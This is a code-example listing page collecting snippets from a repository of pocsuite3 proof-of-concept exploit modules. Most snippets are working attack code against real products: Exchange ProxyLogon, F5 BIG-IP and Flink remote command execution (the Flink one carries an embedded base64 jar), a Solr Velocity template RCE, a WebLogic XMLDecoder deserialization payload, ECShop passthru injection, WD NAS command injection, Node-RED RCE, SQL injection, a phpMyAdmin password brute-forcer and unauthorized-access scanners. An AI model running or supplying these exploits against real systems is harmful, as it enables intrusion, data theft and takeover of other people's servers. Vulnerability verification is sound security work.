Here are the examples of the python api pocsuite3.api.requests.get taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.
58 Examples
3
Source : bt_unauth_access_phpmyadmin.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def exploit(self, mode):
result = {}
url_pr = urlparse(self.url)
scheme = url_pr.scheme
host = url_pr.hostname
port = 888
vul_url = "{}://{}:{}/pma/".format(scheme, host, port)
resp = requests.get(vul_url, timeout=5)
if resp.status_code == 200 and "phpmyadmin" in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
return result
def _verify(self):
3
Source : check_http_status.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
# print(self.url)
url = self.url
# print(url)
try:
resp = requests.get(url, verify=False, timeout=5)
if resp.status_code != 404:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['PoC'] = str(resp.status_code)
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _attack(self):
3
Source : CVE-2021-21972.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
try:
vul_url = urljoin(
self.url, "/ui/vropspluginui/rest/services/uploadova")
resp1 = requests.get(self.url)
resp2 = requests.get(vul_url)
if '/vsphere-client' in resp1.text and resp2.status_code == 405:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
except Exception as e:
logger.error(e)
return self.parse_output(result)
def _attack(self):
3
Source : CVE-2021-26855.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
try:
vul_url = urljoin(self.url, "/owa/auth/x.js")
headers = {
'Cookie': 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'
}
resp = requests.get(vul_url, headers=headers, timeout=10)
if resp.status_code == 500 and 'NegotiateSecurityContext' in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
except Exception as e:
logger.error(e)
return self.parse_output(result)
def _attack(self):
3
Source : fofacms.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
"""verify mode"""
result = {}
target = self.url
try:
resp = requests.get(target).text
cms_info = self.fingerprint(resp)
if cms_info != "":
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target
result['VerifyInfo']['Info'] = cms_info
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def parse_output(self, result):
3
Source : node_red_unauthorized_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def need_auth(url):
response = requests.get("{}/settings".format(url))
if response.status_code == 401:
return 1
return 0
def login(url, username="admin", password="password"):
3
Source : phpmyadmin_burst.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def pma_login(self, url, username, password):
for i in range(2):
try:
res = requests.get(url)
cookies = dict(res.cookies)
data = {
'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", res.text, re.I).group(1)),
'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", res.text, re.I).group(1)),
'pma_username': username,
'pma_password': password,
}
res = requests.post(url, cookies=cookies, data=data, timeout=3)
cookies = dict(res.cookies)
return 'pmaAuth-1' in cookies
except:
pass
return False
def get_word_list(self):
3
Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def elasticsearch(self, ip):
try:
url = 'http://' + ip + ':9200/_cat'
r = requests.get(url, timeout=5)
if '/_cat/master' in r.content.decode():
return ip + ":9200 elasticsearch未授权"
return False
except Exception as e:
pass
def zookeeper(self, ip):
3
Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def CouchDB(self, ip):
try:
url = 'http://' + ip + ':5984'+'/_utils/'
r = requests.get(url, timeout=5)
if 'couchdb-logo' in r.content.decode():
return ip + ":5984 CouchDB未授权"
return False
except Exception as e:
pass
def docker(self, ip):
3
Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def docker(self, ip):
try:
url = 'http://' + ip + ':2375'+'/version'
r = requests.get(url, timeout=5)
if 'ApiVersion' in r.content.decode():
return ip + ":2375 docker api未授权"
return False
except Exception as e:
pass
def Hadoop(self, ip):
3
Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def Hadoop(self, ip):
try:
url = 'http://' + ip + ':50070'+'/dfshealth.html'
r = requests.get(url, timeout=5)
if 'hadoop.css' in r.content.decode():
return ip + ":50070 Hadoop未授权"
return False
except Exception as e:
pass
def _attack(self):
3
Source : wd_nas_login_bypass_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
cmd = 'cat /proc/cpuinfo'
data = "';{};'".format(cmd)
headers = {'cookie': 'isAdmin=1;username=admin'}
try:
requests.get(veri_url1)
resp = requests.post(veri_url2, data=data, headers=headers)
if any(keyword in resp.text for keyword in ['Processor', 'BogoMIPS', 'Hardware', 'Revision']):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
except Exception as e:
logger.warn(str(e))
return self.parse_verify(result)
def _attack(self):
3
Source : wd_nas_login_bypass_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _shell(self):
veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
cmd = self.get_option("command")
data = "';{};'".format(cmd)
headers = {'cookie': 'isAdmin=1;username=admin'}
try:
requests.get(veri_url1)
requests.post(veri_url2, data=data, headers=headers)
except Exception as e:
logger.warn(str(e))
def parse_verify(self, result):
3
Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def get_url(url):
try:
return requests.get(url).url
except:
return url
def fix_url(url):
3
Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def is_url_exist(url):
try:
resp = requests.get(url)
if resp.status_code == 404:
return True
except Exception as e:
pass
return False
def isSameDomain(url1, url2):
3
Source : shiziyuCMS_sqli.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
payload = r"index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)"
url = self.url + payload
r = requests.get(url, verify=False)
if "XPATH syntax error" in r.text:
regx = re.findall(r'XPATH syntax error: .*?\r\n', r.text)
dbname = re.findall(r'~.*?~', regx[0])[0]
result['VerifyInfo'] = {}
result['Database'] = {}
result['Database']['DBname'] = dbname.strip('~')
result['VerifyInfo']['URL'] = url
return self.parse_output(result)
def _attack(self):
0
Source : springboot_actuator_all_unauthorized.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
# 测试路径和接口字典:
dir_path = ('', 'actuator', 'moniter')
dir_file_list = ('mappings', 'metrics', 'beans', 'configprops', 'env')
api_filie_list = ('swagger-ui.html', 'api-docs', 'v2/api-docs')
result_verified_url = []
# 测试sprintboot actuator
for path in dir_path:
for file_name in dir_file_list:
url_list = []
url_list.append(self.url)
if not self.url.endswith('/'):
url_list.append('/')
if path:
url_list.append(path + '/')
url_list.append(file_name)
url = ''.join(url_list)
try:
r = req.get(url)
if r.status_code == 200:
try:
# 正常情况下返回是JSON格式
json.loads(r.text)
result_verified_url.append(
'{}/{}'.format(path, file_name))
except:
pass
except:
pass
# 一般来说只会配置一个web prefix,所以如果测试有就不尝试其它目录了
if len(result_verified_url) > 0:
break
# 测试api、swagger:
for file_name in api_filie_list:
if self.url.endswith('/'):
url = self.url + file_name
else:
url = self.url + '/' + file_name
try:
r = req.get(url)
if r.status_code == 200:
result_verified_url.append(file_name)
except:
pass
if len(result_verified_url) > 0:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['extra'] = {}
result['extra']['evidence'] = '\r\n'.join(result_verified_url)
return self.parse_attack(result)
def _attack(self):
0
Source : f5-CVE-2020-5902_all_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [443]
for port in ports:
for schema in ['http','https']:
try:
# check bypass
url_check = '{}://{}:{}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=test5902'.format(schema,pr.hostname,port)
r_test = req.get(url_check,verify=False)
# check fileRead.jsp
if r_test.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
url_read = '{}://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/group'.format(schema,pr.hostname,port)
r_read = req.get(url_read,verify = False)
if r_read.status_code == 200:
result['extra'] = {}
result['extra']['evidence'] = r_read.content.decode('utf-8').strip()
break
except:
#raise
pass
return self.parse_attack(result)
def _attack(self):
0
Source : flink-CVE-2020-17518_1.11.2_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [8081]
for port in ports:
try:
#get flink web path
url_check = '{}://{}:{}/jobmanager/config'.format(pr.scheme, pr.hostname, port)
r_test = req.get(url_check, verify=False)
if r_test.status_code == 200:
m = re.findall(b'/tmp/flink-web-(.+?)"',r_test.content)
if not m:
continue
#upload jars
random_jars = '{}.jar'.format(random.randint(10000,100000))
flink_upload_pathfile = '/tmp/flink-web-{}/flink-web-upload/{}'.format(m[0].decode('utf-8'),random_jars)
upload_files = {'jarfile': (flink_upload_pathfile, base64.b64decode('UEsDBBQAAAAIAASBJlLHe4y+9gIAAOgEAAANAAAARXhlY3V0ZS5jbGFzc21Uy1bUQBC9zTwSQnhFBEZ8gAoOCIwiKgKivEWGhwbRATaZ0AcCMwkmPQIbN/oTfIFrNoNHjn6Av+MatToqLycn6UpX3Vt1q7uT7z+/fAPQixUNTehQcVtFp4YudGsoR0rFHWnvKuhRcE9Fr4r7GlQ8UPFQQZ+KRxqq0C+HARWDMvRYwZCGJ3iqoQ7DKkakHZXDmIJxBRMM8UHHdcQQQyTZvsgQHfVWOUN12nH5bCGf5f6Clc1xCuQtx2WoTy6nN6x3VipnuWspU/iOuzYgiZWmsOzNGWsrxJNABZOklEEb37H5lnA8N1DwjOamV/BtPuHIrPr4DrcLgnfLnDou4woDGBQv6HatPKWZ0vEc0zrSmCGJ246rYxZzDI0nIuZ9z+ZBMFJwcqvcZ6g5r4/y2fnVbr5DBctStizTQr5U1nFTwTqJCAmOl/qjqTwMZK1gXSLndbzASyJ2EdHEAkNtCC8IJ5cybct1ua/glY5FvJb4NwRdGdaRwZKOZdmP8rfHM8rmshvcFgwXSiwneU98x6t3trHdQPA8Q8UaF9T/FvfFLkNbssTelMpfIby0t839USsgWXXJkiDV9lxBmx4wNJ1OPLpu+SZ/W+CuzQfalxguJksfiTjfcQIRyKMlYbFAWL4g+Em5k92jerXnncSsov6m3K2CoLTcooYbiPxvu04FiN6YLBUIheiFgI/xnJN3hDwgt0ou03+7Sjljds4LOFpwiT5IeZWByUNK41WatZBlZGMdB2D7kCf3Go0awciJKOL0vTYTrCyE/6B5nOxHoyzdEemZMSKfES0iZsSLUPbQfAg1E/+K8kzE0MxM1KgwM7FO8wD67Cf0GpX90UNUZYzqA9QUUbsHxagm1zEnEZUc45jTVcQFGa/LJKjIxQPUGw1FNPbHErEiEvuymVBtD3QayxEh3Qq9N6CSfkHV6EMNJlGLafpbcPJuohHvkcAHWozrxGhF5Ai9Cm7QfYR6kPlF4aiCm/Qa3q0Ea6MnClp0epJh0fbfUEsDBAoAAAgAACJ1bU8AAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAQI/ABQAAAAIAASBJlLHe4y+9gIAAOgEAAANACQAAAAAAAAAIAAAAAAAAABFeGVjdXRlLmNsYXNzCgAgAAAAAAABABgAsQeXEAPk1gFyshItA+TWAdyLEi0D5NYBUEsBAgoACgAACAAAInVtTwAAAAAAAAAAAAAAAAkAAAAAAAAAAAAAAAAAIQMAAE1FVEEtSU5GL1BLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAEgDAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwUGAAAAAAMAAwDcAAAAvgMAAAAA'))}
url_upload = '{}://{}:{}/jars/upload'.format(pr.scheme, pr.hostname, port)
r_upload = req.post(url_upload,files=upload_files,verify=False)
if r_upload.status_code != 400:
continue
# exeucte
random_log = 'flink--standalonesession-0-{}.log'.format(random.randint(10000,100000))
url_exeucte = '{}://{}:{}/jars/{}/run?entry-class=Execute&program-args="touch $FLINK_HOME/log/{}"'.format(
pr.scheme, pr.hostname, port,random_jars,random_log)
r_execute = req.post(url_exeucte, verify=False)
# check log exists:
if r_execute.status_code != 400:
continue
url_log_exist = '{}://{}:{}/jobmanager/logs/{}'.format(pr.scheme, pr.hostname, port,random_log)
r_exist = req.get(url_log_exist, verify=False)
if r_exist.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(
pr.hostname, port)
break
except:
raise
#pass
return self.parse_attack(result)
def _attack(self):
0
Source : flink-CVE-2020-17519_1.11.2_fileread.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [8081]
for port in ports:
try:
url_check = '{}://{}:{}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fgroup'.format(
pr.scheme, pr.hostname, port)
r_test = req.get(url_check, verify=False)
if r_test.status_code == 200 and re.findall(b'^root:x:0', r_test.content):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(
pr.hostname, port)
result['extra'] = {}
result['extra']['evidence'] = r_test.content.decode(
'utf-8').strip()
except:
#raise
pass
return self.parse_attack(result)
def _attack(self):
0
Source : hikvision-2013-4976_web_login-bypass.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def check(uri):
headers = {
'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}
timeout = 5
url = '{}/doc/page/main.asp'.format(uri)
cookies = {'userInfo80': 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='}
try:
r = req.get(url, headers=headers, cookies=cookies, timeout=timeout)
if b'playback.asp' in r.content and b' < div id="mainFrame">' in r.content:
return True, url
else:
return False, 'No server page find'
except req.exceptions.ConnectionError:
return False, 'ConnectionError'
except req.exceptions.ReadTimeout:
return False, 'ReadTimeout'
except Exception as e:
# raise
return False, str(e)
class TestPOC(POCBase):
0
Source : iis-ms15-034_7_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
def check(url):
Server_Tag = ['Microsoft-HTTP', 'Microsoft-IIS']
try:
Request_Tmp = req.get(url)
remote_server = Request_Tmp.headers['server']
if (tmp_tag in remote_server for tmp_tag in Server_Tag):
return test_ms15_034(url)
else:
return (False, 'Web Service Is Not IIS\n[+] May Be ' + remote_server)
except req.exceptions.ConnectTimeout:
return (False, 'timeout')
except Exception as e:
# raise
return (False, '{}'.format(str(e)))
def test_ms15_034(url):
Req_headers = {'Host': 'stuff',
'Range': 'bytes=0-18446744073709551615'}
Request = req.get(url, headers=Req_headers)
if b'Requested Range Not Satisfiable' in Request.content:
return (True, Request.content)
elif b'The request has an invalid header name' in Request.content:
return (False, 'The vulnerability has been fixed!')
else:
return (False, 'The IIS service was unable to display the vulnerability exists, the need for manual testing!')
result = {}
pr = urlparse(self.url)
if pr.port: # and pr.port not in ports:
ports = [pr.port]
else:
ports = [80]
for port in ports:
try:
url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
status, msg = check(url)
if status:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(
pr.hostname, port)
break
except:
pass
return self.parse_output(result)
def _attack(self):
0
Source : iis-shortname_6_disclosure.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
# reference from https://github.com/lijiejie/IIS_shortname_Scanner/blob/master/iis_shortname_Scan.py
def check(url):
url1 = url + '/*~1*/index99.aspx' # an existed file/folder
url2 = url + '/1ndex*~1*/index99.aspx' # not existed file/folder
# for _method in ['GET', 'OPTIONS']:
try:
# GET:
r1 = req.get(url1)
status_1 = r1.status_code
r2 = req.get(url2)
status_2 = r2.status_code
if status_1 == 404 and status_2 != 404:
return True
# OPTIONS:
r1 = req.options(url1)
status_1 = r1.status_code
r2 = req.options(url2)
status_2 = r2.status_code
if status_1 == 404 and status_2 != 404:
return True
return False
except Exception as e:
# raise
return False
result = {}
pr = urlparse(self.url)
if pr.port: # and pr.port not in ports:
ports = [pr.port]
else:
ports = [80]
for port in ports:
try:
url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
status = check(url)
if status:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(
pr.hostname, port)
break
except:
pass
return self.parse_output(result)
def _attack(self):
0
Source : solr_8.3.1_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [8983]
for port in ports:
target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
# 获取目标系统任意核心
target1 = target + "/solr/admin/cores?indexInfo=false&wt=json"
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
res1 = req.get(target1, headers=headers)
core = json.loads(res1.content.decode())
core2 = core['status'].keys()
core3 = list(core2)[0]
# 修改core下的配置文件,开启params.resource.loader.enabled
target2 = target + "/solr/" + core3 + "/config"
post_json = {"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity",
"params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}}
res2 = req.post(target2, headers=headers, json=post_json)
# 开启后,直接Get 访问(带入表达式)进行 远程代码命令执行
target3 = target + "/solr/" + core3 + \
"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27echo%20d0xdeadbeaf%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
response = req.get(target3, headers=headers)
if response and response.status_code == 200 and "0xdeadbeaf" in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(
pr.hostname, port)
break
return self.parse_output(result)
def _attack(self):
0
Source : weblogic-console-2020-14882_all_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
headers = {
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
def check_console(target):
if not target.startswith('http'):
target = 'http://{}'.format(target)
url = '{}/console/'.format(target)
try:
r = req.get(url, headers=headers, verify=False, timeout=5)
if r.status_code == req.codes.ok:
if 'Deploying application for /console/...' in r.text:
time.sleep(2)
return (True, r.text.strip())
elif r.status_code == 404:
return (False, '404')
else:
return (False, r.status_code)
except req.exceptions.ReadTimeout:
return (False, 'timeout')
except Exception as ex:
# raise
return (False, str(ex))
def check_weblogic_console_page(target):
s = req.session()
console_url = '/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1'
if not target.startswith('http'):
target = 'http://{}'.format(target)
url = '{}{}'.format(target, console_url)
try:
# get session cookes
r = s.get(url, allow_redirects=False)
# 302 to portal
if r.status_code == 302:
r = s.get(url)
if r.status_code == 200 and 'id="HomePage1"' in r.text:
m = re.findall(
' < p id="footerVersion">(.*?) < /p>', r.text)
if m:
return (True, m[0])
else:
return(True, '')
return (False, '')
except req.exceptions.ReadTimeout:
return (False, 'timeout')
except Exception as ex:
# raise
return (False, str(ex))
'''
verify:
'''
result = {}
pr = urlparse(self.url)
if pr.port: # and pr.port not in ports:
ports = [pr.port]
else:
ports = [7001, 17001, 27001]
for port in ports:
uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
status, msg = check_console(uri)
if status:
status, msg = check_weblogic_console_page(uri)
if status:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = uri
result['extra'] = {}
result['extra']['evidence'] = msg
break
return self.parse_output(result)
def _attack(self):
0
Source : weblogic-wls-2017-10271_all_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
flag = "".join(random.choice(string.ascii_letters)
for _ in range(0, 8))
output_file = '{}.txt'.format(flag)
'''
payload的格式化
'''
def payload_command():
command_filtered = " < string>{} < /string>".format(flag)
payload_1 = '''
< soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
< soapenv:Header> < work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
< java>
< java version="1.6.0" class="java.beans.XMLDecoder">
< object class="java.io.PrintWriter">
< string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{} < /string>
< void method="println">{} < /void> < void method="close"/>
< /object>
< /java>
< /java>
< /work:WorkContext>
< /soapenv:Header> < soapenv:Body/> < /soapenv:Envelope>'''.format(output_file, command_filtered)
return payload_1
'''
检查结果
'''
def verify_result(target):
headers = {
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
# url增加时间戳避免数据是上一次的结果缓存
output_url = '{}/bea_wls_internal/{}?{}'.format(
target, output_file, int(time.time()))
try:
r = req.get(output_url, headers=headers)
if r.status_code == req.codes.ok and flag in r.text:
return (True, 'success')
elif r.status_code == 404:
return (False, '404 no output')
else:
return (False, r.status_code)
except req.exceptions.ReadTimeout:
return (False, 'timeout')
except Exception as ex:
# raise
return (False, str(ex))
'''
RCE POC
'''
def weblogic_rce(target):
url = '{}/wls-wsat/CoordinatorPortType'.format(target)
# content-type必须为text/xml
payload_header = {'content-type': 'text/xml',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
try:
r = req.post(url, payload_command(),
headers=payload_header, verify=False)
# 500时说明已成功反序列化执行命令
if r.status_code == 500:
return verify_result(target)
elif r.status_code == 404:
return (False, '404 no vulnerability')
else:
return (False, '{} something went wrong'.format(r.status_code))
except req.exceptions.ReadTimeout:
return (False, 'timeout')
except Exception as ex:
# raise
return (False, str(ex))
'''
verify:
'''
result = {}
pr = urlparse(self.url)
if pr.port: # and pr.port not in ports:
ports = [pr.port]
else:
ports = [7001, 17001, 27001]
for port in ports:
uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
status, msg = weblogic_rce(uri)
if status:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = uri
break
return self.parse_output(result)
def _attack(self):
0
Source : CVE-2020-3452.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
# print(self.url)
url = self.url
# print(url)
try:
poc1 = '{}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
poc2 = '{}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'
resp_poc1 = requests.get(poc1.format(url), verify=False, timeout=5)
resp_poc2 = requests.get(poc2.format(url), verify=False, timeout=5)
# flag = random_str(length=10)
if ('common.lua' in resp_poc1.text) or ('browser_inc.lua' in resp_poc1.text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['PoC'] = poc1.format('')
elif ('common.lua' in resp_poc2.text) or ('browser_inc.lua' in resp_poc2.text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['PoC'] = poc2.format('')
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _attack(self):
0
Source : CVE-2020-5902.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
# print(self.url)
url = self.url.replace("http://", "")
# print(url)
try:
url1 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
url2 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'
url3 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'
url4 = 'https://{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
requests.get(url1.format(url), verify=False, timeout=5)
requests.get(url2.format(url), verify=False, timeout=5)
# flag = random_str(length=10)
resp = requests.get(url3.format(url), verify=False, timeout=5)
if 'uid=0(root)' in resp.text:
r = requests.get(
'https://{}/tmui/login.jsp'.format(url), verify=False, timeout=5)
hostname = re.search(
r' < p\stitle=\"(.*?)\">', r.text).group(1).strip().lower()
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Hostname'] = hostname
except Exception as ex:
logger.error(str(ex))
requests.get(url4.format(url), verify=False, timeout=5)
return self.parse_output(result)
def _attack(self):
0
Source : ecshop_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _verify(self):
result = {}
url = urljoin(self.url, '/user.php?act=login')
phpcode = "phpinfo()"
flagText = "allow_url_include"
# ECShop 2.x payload
ec2payload = self.gen_ec2payload(phpcode)
# ECShop 3.x payload
ec3payload = self.gen_ec3payload(phpcode)
option = self.get_option("app_version")
if option == "Auto":
payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
elif option == "2.x":
payloads = [(ec2payload, '2.x')]
elif option == '3.x':
payloads = [(ec3payload, '3.x')]
for payload, version in payloads:
headers = {'Referer': payload}
try:
rr = requests.get(url, headers=headers)
if flagText in rr.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Version'] = version
break
except ReadTimeout:
break
except Exception as e:
pass
return self.parse_output(result)
def parse_output(self, result):
0
Source : ecshop_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
def _exploit(self, cmd='whoami'):
url = urljoin(self.url, '/user.php?act=login')
phpcode = 'passthru("{0}");'.format(cmd)
# ECShop 2.x payload
ec2payload = self.gen_ec2payload(phpcode)
# ECShop 3.x payload
ec3payload = self.gen_ec3payload(phpcode)
option = self.get_option("app_version")
if option == "Auto":
payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
elif option == "2.x":
payloads = [(ec2payload, '2.x')]
elif option == '3.x':
payloads = [(ec3payload, '3.x')]
# payloads = [ec2payload, ec3payload]
for payload in payloads:
headers = {'Referer': payload[0]}
resp = requests.get(url, headers=headers)
r = get_middle_text(resp.text, ''' < input type="hidden" name="back_act" value="''', "\n < br />")
if r:
return r
r = get_middle_text(resp.text, ''' < input type="hidden" name="back_act" value="''', 'xxx')
if r:
return r
register_poc(DemoPOC)
0
Source : node_red_unauthorized_rce.py
with GNU General Public License v3.0
from 78778443
with GNU General Public License v3.0
from 78778443
async def exploit(url, command, shell=False, access_token=None):
ws_url = url.replace("http", "ws")
headers = {"Node-RED-API-Version": "v2"}
if access_token is not None:
headers["Authorization"] = "Bearer {}".format(access_token)
async with websockets.connect("{}/comms".format(ws_url)) as websocket:
if access_token is not None:
await websocket.send(json.dumps({"auth": access_token}))
while True:
response = await websocket.recv()
message = json.loads(response)
if "auth" in message and message["auth"] == "ok":
print("[+] Successfully authenticated over WebSocket.")
break
print("[+] Establishing RCE link ....")
await websocket.send(json.dumps({"subscribe": "debug"}))
current_flows = {"flows": []}
try:
resp = requests.get("{}/flows".format(url), headers=headers)
if "flows" in resp.json():
current_flows["flows"] = resp.json()["flows"]
payload = {"flows": merge_lists(current_flows["flows"], EXEC_FLOW, "id")}
for flow in payload["flows"]:
if flow["id"] == EXEC_BLOCK_NAME:
flow["command"] = command
resp = requests.post(
